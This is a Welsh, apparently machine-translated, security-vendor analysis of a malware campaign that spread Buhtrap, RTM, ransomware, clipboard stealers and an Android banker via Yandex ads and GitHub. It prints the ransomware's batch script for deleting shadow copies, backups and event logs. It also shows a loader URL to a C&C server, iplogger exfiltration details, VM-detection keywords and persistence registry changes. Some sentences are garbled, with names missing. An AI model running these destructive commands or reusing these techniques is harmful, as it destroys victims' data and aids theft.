I dargedu cyfrifwyr mewn ymosodiad seiber, gallwch ddefnyddio dogfennau gwaith y maent yn chwilio amdanynt ar-lein. Yn fras, dyma beth mae grŵp seiber wedi bod yn ei wneud dros yr ychydig fisoedd diwethaf, gan ddosbarthu drysau cefn hysbys. и , yn ogystal ag amgryptio a meddalwedd ar gyfer dwyn cryptocurrencies. Mae'r rhan fwyaf o dargedau wedi'u lleoli yn Rwsia. Cynhaliwyd yr ymosodiad trwy osod hysbysebion maleisus ar Yandex.Direct. Cyfeiriwyd dioddefwyr posibl at wefan lle gofynnwyd iddynt lawrlwytho ffeil faleisus wedi'i chuddio fel templed dogfen. Tynnodd Yandex yr hysbysebion maleisus ar ôl ein rhybudd.
Mae cod ffynhonnell Buhtrap wedi'i ollwng ar-lein yn y gorffennol fel y gall unrhyw un ei ddefnyddio. Nid oes gennym unrhyw wybodaeth am argaeledd cod RTM.
Yn y swydd hon byddwn yn dweud wrthych sut y dosbarthodd yr ymosodwyr malware gan ddefnyddio Yandex.Direct a'i gynnal ar GitHub. Bydd y swydd yn gorffen gyda dadansoddiad technegol o'r malware.
Mae Buhtrap ac RTM yn ôl mewn busnes
Mecanwaith lledaeniad a dioddefwyr
Mae'r llwythi tâl amrywiol a ddosberthir i ddioddefwyr yn rhannu mecanwaith lluosogi cyffredin. Gosodwyd yr holl ffeiliau maleisus a grëwyd gan yr ymosodwyr mewn dwy storfa GitHub wahanol.
Yn nodweddiadol, roedd yr ystorfa yn cynnwys un ffeil faleisus y gellid ei lawrlwytho, a oedd yn newid yn aml. Gan fod GitHub yn caniatáu ichi weld hanes newidiadau i ystorfa, gallwn weld pa malware a ddosbarthwyd yn ystod cyfnod penodol. I argyhoeddi'r dioddefwr i lawrlwytho'r ffeil faleisus, defnyddiwyd y wefan blanki-shabloni24[.]ru, a ddangosir yn y ffigur uchod.
Mae dyluniad y wefan a holl enwau'r ffeiliau maleisus yn dilyn un cysyniad - ffurflenni, templedi, contractau, samplau, ac ati. strategaeth yn yr ymgyrch newydd yr un fath. Yr unig gwestiwn yw sut y cyrhaeddodd y dioddefwr safle'r ymosodwyr.
Haint
Denwyd o leiaf sawl dioddefwr posibl a ddaeth i ben ar y wefan hon gan hysbysebu maleisus. Isod mae URL enghreifftiol:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Fel y gwelwch o'r ddolen, postiwyd y faner ar y fforwm cyfrifo cyfreithlon bb.f2[.]kz. Mae'n bwysig nodi bod y baneri yn ymddangos ar wahanol safleoedd, roedd gan bob un yr un id ymgyrch (blanki_rsya), a'r rhan fwyaf yn ymwneud â chyfrifo neu wasanaethau cymorth cyfreithiol. Mae'r URL yn dangos bod y dioddefwr posib wedi defnyddio'r cais “lawrlwytho ffurflen anfoneb,” sy'n cefnogi ein rhagdybiaeth o ymosodiadau wedi'u targedu. Isod mae'r gwefannau lle ymddangosodd y baneri a'r ymholiadau chwilio cyfatebol.
- lawrlwytho ffurflen anfoneb – bb.f2[.]kz
- contract sampl - Ipopen[.]ru
- sampl cwyn cais - 77metrov[.]ru
- ffurflen cytundeb - blank-dogovor-kupli-prodazhi[.]ru
- deiseb llys sampl - zen.yandex[.]ru
- cwyn sampl - yurday[.]ru
- ffurflenni contract enghreifftiol – Regforum[.]ru
- ffurflen contract – assistentus[.]ru
- cytundeb fflat enghreifftiol – napravah[.]com
- samplau o gontractau cyfreithiol - avito[.]ru
Mae'n bosibl bod y wefan blanki-shabloni24[.]ru wedi'i ffurfweddu i basio asesiad gweledol syml. Yn nodweddiadol, nid yw hysbyseb sy'n pwyntio at wefan sy'n edrych yn broffesiynol gyda dolen i GitHub yn ymddangos fel rhywbeth amlwg o ddrwg. Yn ogystal, uwchlwythodd yr ymosodwyr ffeiliau maleisus i'r ystorfa am gyfnod cyfyngedig yn unig, yn debygol yn ystod yr ymgyrch. Y rhan fwyaf o'r amser, roedd ystorfa GitHub yn cynnwys archif zip gwag neu ffeil EXE wag. Felly, gallai ymosodwyr ddosbarthu hysbysebion trwy Yandex.Direct ar wefannau yr ymwelwyd â hwy fwyaf tebygol gan gyfrifwyr a ddaeth mewn ymateb i ymholiadau chwilio penodol.
Nesaf, gadewch i ni edrych ar y llwythi tâl amrywiol a ddosberthir yn y modd hwn.
Dadansoddiad Llwyth Tâl
Cronoleg dosbarthiad
Dechreuodd yr ymgyrch faleisus ddiwedd mis Hydref 2018 ac mae’n weithredol ar adeg ysgrifennu hwn. Gan fod yr ystorfa gyfan ar gael i'r cyhoedd ar GitHub, rydym wedi llunio llinell amser gywir o ddosbarthiad chwe theulu malware gwahanol (gweler y ffigur isod). Rydym wedi ychwanegu llinell yn dangos pryd y darganfuwyd y ddolen faner, fel y'i mesurwyd gan delemetreg ESET, i'w gymharu â hanes git. Fel y gallwch weld, mae hyn yn cydberthyn yn dda ag argaeledd y llwyth tâl ar GitHub. Gellir esbonio'r anghysondeb ar ddiwedd mis Chwefror gan y ffaith nad oedd gennym ran o'r hanes newid oherwydd bod yr ystorfa wedi'i thynnu o GitHub cyn y gallem ei chael yn llawn.
Ffigur 1. Cronoleg dosbarthiad malware.
Tystysgrifau Arwyddo Cod
Defnyddiodd yr ymgyrch dystysgrifau lluosog. Llofnodwyd rhai gan fwy nag un teulu malware, sy'n dangos ymhellach bod gwahanol samplau yn perthyn i'r un ymgyrch. Er gwaethaf argaeledd yr allwedd breifat, nid oedd gweithredwyr yn llofnodi'r binaries yn systematig ac ni wnaethant ddefnyddio'r allwedd ar gyfer pob sampl. Ddiwedd mis Chwefror 2019, dechreuodd ymosodwyr greu llofnodion annilys gan ddefnyddio tystysgrif sy'n eiddo i Google nad oedd ganddynt yr allwedd breifat ar ei chyfer.
Mae'r holl dystysgrifau sy'n ymwneud â'r ymgyrch a'r teuluoedd malware y maent yn eu llofnodi wedi'u rhestru yn y tabl isod.
Rydym hefyd wedi defnyddio'r tystysgrifau llofnodi cod hyn i sefydlu cysylltiadau â theuluoedd malware eraill. Ar gyfer y rhan fwyaf o dystysgrifau, ni wnaethom ddod o hyd i samplau na chawsant eu dosbarthu trwy ystorfa GitHub. Fodd bynnag, defnyddiwyd tystysgrif TOV “MARIYA” i lofnodi meddalwedd maleisus sy'n perthyn i'r botnet , hysbyswedd a glowyr. Mae'n annhebygol bod y malware hwn yn gysylltiedig â'r ymgyrch hon. Yn fwyaf tebygol, prynwyd y dystysgrif ar y darknet.
Win32/Filecoder.Buhtrap
Y gydran gyntaf i ddal ein sylw oedd y Win32/Filecoder.Buhtrap sydd newydd ei ddarganfod. Ffeil ddeuaidd Delphi yw hon sydd weithiau'n cael ei phecynnu. Fe'i dosbarthwyd yn bennaf rhwng Chwefror a Mawrth 2019. Mae'n ymddwyn fel sy'n gweddu i raglen ransomware - mae'n chwilio gyriannau lleol a ffolderi rhwydwaith ac yn amgryptio'r ffeiliau y mae'n dod o hyd iddynt. Nid oes angen iddo beryglu cysylltiad Rhyngrwyd oherwydd nid yw'n cysylltu â'r gweinydd i anfon allweddi amgryptio. Yn lle hynny, mae'n ychwanegu “tocyn” at ddiwedd y neges pridwerth, ac yn awgrymu defnyddio e-bost neu Bitmessage i gysylltu â gweithredwyr.
Er mwyn amgryptio cymaint o adnoddau sensitif â phosibl, mae Filecoder.Buhtrap yn rhedeg edefyn a gynlluniwyd i ddiffodd meddalwedd allweddol a allai fod â thrinwyr ffeiliau agored sy'n cynnwys gwybodaeth werthfawr a allai ymyrryd ag amgryptio. Mae'r prosesau targed yn bennaf yn systemau rheoli cronfa ddata (DBMS). Yn ogystal, mae Filecoder.Buhtrap yn dileu ffeiliau log a chopïau wrth gefn i wneud adfer data yn anodd. I wneud hyn, rhedwch y sgript swp isod.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Mae Filecoder.Buhtrap yn defnyddio gwasanaeth Logger IP dilys ar-lein sydd wedi'i gynllunio i gasglu gwybodaeth am ymwelwyr gwefan. Bwriad hyn yw olrhain dioddefwyr y ransomware, sef cyfrifoldeb y llinell orchymyn:
mshta.exe "javascript:document.write('');"
Dewisir ffeiliau ar gyfer amgryptio os nad ydynt yn cyfateb i dair rhestr wahardd. Yn gyntaf, nid yw ffeiliau gyda'r estyniadau canlynol wedi'u hamgryptio: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys a .bat. Yn ail, mae'r holl ffeiliau y mae'r llwybr llawn yn cynnwys llinynnau cyfeiriadur o'r rhestr isod wedi'u heithrio.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Yn drydydd, mae rhai enwau ffeiliau hefyd wedi'u heithrio rhag amgryptio, ac yn eu plith enw ffeil y neges pridwerth. Cyflwynir y rhestr isod. Yn amlwg, bwriad pob un o'r eithriadau hyn yw cadw'r peiriant i redeg, ond heb fawr o addasrwydd i'r ffordd fawr.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Cynllun amgryptio ffeil
Ar ôl ei weithredu, mae'r malware yn cynhyrchu pâr allwedd RSA 512-did. Yna mae'r esboniwr preifat (d) a modwlws (n) yn cael eu hamgryptio ag allwedd gyhoeddus 2048-did â chod caled (esboniwr cyhoeddus a modwlws), wedi'i bacio â zlib, ac wedi'i amgodio base64. Dangosir y cod sy’n gyfrifol am hyn yn Ffigur 2.
Ffigur 2. Canlyniad dadgrynhoi Hex-Rays o'r broses cynhyrchu pâr allweddol RSA 512-did.
Isod mae enghraifft o destun plaen gydag allwedd breifat a gynhyrchwyd, sef tocyn sydd ynghlwm wrth y neges pridwerth.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Rhoddir allwedd gyhoeddus yr ymosodwyr isod.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Mae'r ffeiliau wedi'u hamgryptio gan ddefnyddio AES-128-CBC gydag allwedd 256-bit. Ar gyfer pob ffeil wedi'i hamgryptio, cynhyrchir allwedd newydd a fector cychwyn newydd. Mae'r wybodaeth allweddol yn cael ei hychwanegu at ddiwedd y ffeil wedi'i hamgryptio. Gadewch i ni ystyried fformat y ffeil wedi'i hamgryptio.
Mae gan ffeiliau wedi'u hamgryptio'r pennyn canlynol:
Mae data'r ffeil ffynhonnell ynghyd â gwerth hud VEGA yn cael ei amgryptio i'r 0x5000 beit cyntaf. Mae'r holl wybodaeth ddadgryptio ynghlwm wrth ffeil gyda'r strwythur canlynol:
- Mae marciwr maint y ffeil yn cynnwys marc sy'n nodi a yw maint y ffeil yn fwy na 0x5000 beit
— blob bysell AES = ZlibCompress(RSAEncrypt (allwedd AES + IV, allwedd gyhoeddus y pâr allwedd RSA a gynhyrchir))
- blob allwedd RSA = ZlibCompress(RSAEncrypt (allwedd breifat RSA wedi'i chynhyrchu, allwedd gyhoeddus RSA â chod caled))
Win32/ClipBancer
Mae Win32/ClipBanker yn gydran a ddosbarthwyd yn ysbeidiol rhwng diwedd Hydref a dechrau Rhagfyr 2018. Ei rôl yw monitro cynnwys y clipfwrdd, mae'n edrych am gyfeiriadau waledi cryptocurrency. Ar ôl pennu cyfeiriad y waled targed, mae ClipBanker yn ei ddisodli â chyfeiriad y credir ei fod yn perthyn i'r gweithredwyr. Nid oedd y samplau a archwiliwyd gennym wedi'u gosod mewn bocsys nac wedi'u cuddio. Yr unig fecanwaith a ddefnyddir i guddio ymddygiad yw amgryptio llinynnau. Mae cyfeiriadau waled gweithredwr yn cael eu hamgryptio gan ddefnyddio RC4. Y cryptocurrencies targed yw Bitcoin, Bitcoin cash, Dogecoin, Ethereum a Ripple.
Yn ystod y cyfnod yr oedd y malware yn ymledu i waledi Bitcoin yr ymosodwyr, anfonwyd swm bach i VTS, sy'n bwrw amheuaeth ar lwyddiant yr ymgyrch. Yn ogystal, nid oes unrhyw dystiolaeth i awgrymu bod y trafodion hyn yn gysylltiedig â ClipBanker o gwbl.
Win32/RTM
Dosbarthwyd y gydran Win32/RTM am sawl diwrnod yn gynnar ym mis Mawrth 2019. Banciwr Trojan yw RTM a ysgrifennwyd yn Delphi, wedi'i anelu at systemau bancio o bell. Yn 2017, cyhoeddodd ymchwilwyr ESET o'r rhaglen hon, mae'r disgrifiad yn dal yn berthnasol. Ym mis Ionawr 2019, rhyddhaodd Palo Alto Networks hefyd .
Buhtrap Loader
Am beth amser, roedd lawrlwythwr ar gael ar GitHub nad oedd yn debyg i offer Buhtrap blaenorol. Mae'n troi at https://94.100.18[.]67/RSS.php?<some_id> i gael y cam nesaf a'i lwytho'n uniongyrchol i'r cof. Gallwn wahaniaethu rhwng dau ymddygiad y cod ail gam. Yn yr URL cyntaf, pasiodd RSS.php y backdoor Buhtrap yn uniongyrchol - mae'r backdoor hwn yn debyg iawn i'r un sydd ar gael ar ôl i'r cod ffynhonnell gael ei ollwng.
Yn ddiddorol, gwelwn sawl ymgyrch gyda'r drws cefn Buhtrap, a honnir eu bod yn cael eu rhedeg gan wahanol weithredwyr. Yn yr achos hwn, y prif wahaniaeth yw bod y drws cefn yn cael ei lwytho'n uniongyrchol i'r cof ac nad yw'n defnyddio'r cynllun arferol gyda'r broses lleoli DLL y buom yn siarad amdani . Yn ogystal, newidiodd y gweithredwyr yr allwedd RC4 a ddefnyddir i amgryptio traffig rhwydwaith i'r gweinydd C&C. Yn y rhan fwyaf o'r ymgyrchoedd yr ydym wedi'u gweld, nid oedd gweithredwyr yn trafferthu newid yr allwedd hon.
Yr ail ymddygiad, mwy cymhleth oedd bod yr URL RSS.php yn cael ei drosglwyddo i lwythwr arall. Mae'n gweithredu rhywfaint o obfuscation, megis ailadeiladu'r tabl mewnforio deinamig. Pwrpas y cychwynnwr yw cysylltu â'r gweinydd C&C [.] com/api/F27F84EDA4D13B15/2, anfonwch y logiau ac aros am ymateb. Mae'n prosesu'r ymateb fel blob, yn ei lwytho i'r cof ac yn ei weithredu. Roedd y llwyth tâl a welsom yn gweithredu'r llwythwr hwn yr un drws cefn Buhtrap, ond efallai y bydd cydrannau eraill.
Android/Spy.Banker
Yn ddiddorol, darganfuwyd cydran ar gyfer Android hefyd yn ystorfa GitHub. Dim ond am un diwrnod y bu yn y brif gangen - Tachwedd 1, 2018. Ar wahân i gael ei bostio ar GitHub, nid yw telemetreg ESET yn canfod unrhyw dystiolaeth bod y malware hwn yn cael ei ddosbarthu.
Cynhaliwyd y gydran fel Pecyn Cais Android (APK). Mae'n obfuscated drwm. Mae'r ymddygiad maleisus wedi'i guddio mewn JAR wedi'i amgryptio sydd wedi'i leoli yn yr APK. Mae wedi'i amgryptio gyda RC4 gan ddefnyddio'r allwedd hon:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Defnyddir yr un allwedd ac algorithm i amgryptio llinynnau. Mae JAR wedi'i leoli yn APK_ROOT + image/files. Mae 4 beit cyntaf y ffeil yn cynnwys hyd y JAR wedi'i amgryptio, sy'n dechrau yn syth ar ôl y maes hyd.
Ar ôl dadgryptio'r ffeil, fe wnaethom ddarganfod mai Anubis ydoedd - yn flaenorol banciwr ar gyfer Android. Mae gan y malware y nodweddion canlynol:
- recordiad meicroffon
- cymryd sgrinluniau
- cael cyfesurynnau GPS
- keylogger
- amgryptio data dyfais a galw am bridwerth
- anfon sbam
Yn ddiddorol, defnyddiodd y bancwr Twitter fel sianel gyfathrebu wrth gefn i gael gweinydd C&C arall. Roedd y sampl a ddadansoddwyd gennym yn defnyddio'r cyfrif @JonesTrader, ond ar adeg y dadansoddi roedd eisoes wedi'i rwystro.
Mae'r bancwr yn cynnwys rhestr o geisiadau targed ar y ddyfais Android. Mae'n hirach na'r rhestr a gafwyd yn astudiaeth Sophos. Mae'r rhestr yn cynnwys llawer o gymwysiadau bancio, rhaglenni siopa ar-lein fel Amazon ac eBay, a gwasanaethau cryptocurrency.
MSIL/ClipBanker.IH
Y gydran olaf a ddosbarthwyd fel rhan o'r ymgyrch hon oedd gweithredadwy .NET Windows, a ymddangosodd ym mis Mawrth 2019. Roedd y rhan fwyaf o'r fersiynau a astudiwyd wedi'u pecynnu gyda ConfuserEx v1.0.0. Fel ClipBanker, mae'r gydran hon yn defnyddio'r clipfwrdd. Ei nod yw ystod eang o cryptocurrencies, yn ogystal â chynigion ar Steam. Yn ogystal, mae'n defnyddio'r gwasanaeth Logger IP i ddwyn yr allwedd WIF preifat Bitcoin.
Mecanweithiau Amddiffyn
Yn ogystal â'r buddion y mae ConfuserEx yn eu darparu wrth atal dadfygio, dympio ac ymyrryd, mae'r gydran yn cynnwys y gallu i ganfod cynhyrchion gwrthfeirws a pheiriannau rhithwir.
I wirio ei fod yn rhedeg mewn peiriant rhithwir, mae'r malware yn defnyddio llinell orchymyn WMI Windows (WMIC) i ofyn am wybodaeth BIOS, sef:
wmic bios
Yna mae'r rhaglen yn dosrannu allbwn y gorchymyn ac yn edrych am eiriau allweddol: VBOX, VirtualBox, XEN, qemu, bochs, VM.
I ganfod cynhyrchion gwrthfeirws, mae malware yn anfon cais Windows Management Instrumentation (WMI) i Windows Security Center gan ddefnyddio ManagementObjectSearcher API fel y dangosir isod. Ar ôl dadgodio o base64 mae'r alwad yn edrych fel hyn:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Ffigur 3. Proses ar gyfer nodi cynhyrchion gwrthfeirws.
Yn ogystal, mae'r malware yn gwirio a , offeryn i amddiffyn rhag ymosodiadau clipfwrdd ac, os yw'n rhedeg, yn atal yr holl edafedd yn y broses honno, a thrwy hynny yn analluogi'r amddiffyniad.
Dyfalwch
Y fersiwn o ddrwgwedd y buom yn astudio copïau ei hun iddo %APPDATA%googleupdater.exe ac yn gosod y priodoledd “cudd” ar gyfer y cyfeiriadur google. Yna mae hi'n newid y gwerth SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell yn y gofrestrfa Windows ac yn ychwanegu'r llwybr updater.exe. Fel hyn, bydd y malware yn cael ei weithredu bob tro y bydd y defnyddiwr yn mewngofnodi.
Ymddygiad maleisus
Fel ClipBanker, mae'r meddalwedd maleisus yn monitro cynnwys y clipfwrdd ac yn edrych am gyfeiriadau waled cryptocurrency, ac o'i ddarganfod, yn ei ddisodli ag un o gyfeiriadau'r gweithredwr. Isod mae rhestr o gyfeiriadau targed yn seiliedig ar yr hyn a geir yn y cod.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Ar gyfer pob math o gyfeiriad mae mynegiant rheolaidd cyfatebol. Defnyddir y gwerth STEAM_URL i ymosod ar y system Steam, fel y gwelir o'r mynegiant rheolaidd a ddefnyddir i ddiffinio yn y byffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Sianel all-hidlo
Yn ogystal â disodli cyfeiriadau yn y byffer, mae'r malware yn targedu allweddi preifat WIF waledi Bitcoin, Bitcoin Core ac Electrum. Mae'r rhaglen yn defnyddio plogger.org fel sianel all-hidlo i gael allwedd breifat WIF. I wneud hyn, mae gweithredwyr yn ychwanegu data allwedd preifat i bennawd HTTP Asiant Defnyddiwr, fel y dangosir isod.
Ffigur 4. IP Logger consol gyda data allbwn.
Ni ddefnyddiodd gweithredwyr iplogger.org i all-hidlo waledi. Mae'n debyg iddynt droi at ddull gwahanol oherwydd y cyfyngiad o 255 nod yn y cae User-Agentarddangos yn y rhyngwyneb gwe IP Logger. Yn y samplau a astudiwyd gennym, cafodd y gweinydd allbwn arall ei storio yn y newidyn amgylchedd DiscordWebHook. Yn syndod, nid yw'r newidyn amgylchedd hwn wedi'i neilltuo yn unrhyw le yn y cod. Mae hyn yn awgrymu bod y malware yn dal i gael ei ddatblygu a bod y newidyn yn cael ei neilltuo i beiriant prawf y gweithredwr.
Mae arwydd arall bod y rhaglen yn cael ei datblygu. Mae'r ffeil ddeuaidd yn cynnwys dau URL iplogger.org, ac mae'r ddau yn cael eu holi pan fydd data'n cael ei all-hidlo. Mewn cais i un o'r URLau hyn, mae'r gwerth yn y maes Atgyfeiriwr yn cael ei ragflaenu gan “DEV /”. Rydym hefyd wedi dod o hyd i fersiwn nad oedd wedi'i becynnu gan ddefnyddio ConfuserEx, enw'r derbynnydd ar gyfer yr URL hwn yw DevFeedbackUrl. Yn seiliedig ar yr enw newidyn amgylchedd, credwn fod y gweithredwyr yn bwriadu defnyddio'r gwasanaeth cyfreithlon Discord a'i system rhyng-gipio gwe i ddwyn waledi cryptocurrency.
Casgliad
Mae'r ymgyrch hon yn enghraifft o'r defnydd o wasanaethau hysbysebu cyfreithlon mewn ymosodiadau seiber. Mae'r cynllun yn targedu sefydliadau Rwsia, ond ni fyddem yn synnu gweld ymosodiad o'r fath yn defnyddio gwasanaethau nad ydynt yn Rwsia. Er mwyn osgoi cyfaddawdu, rhaid i ddefnyddwyr fod yn hyderus yn enw da ffynhonnell y feddalwedd y maent yn ei lawrlwytho.
Mae rhestr gyflawn o ddangosyddion cyfaddawdu a phriodoleddau MITER ATT&CK ar gael yn .
Ffynhonnell: hab.com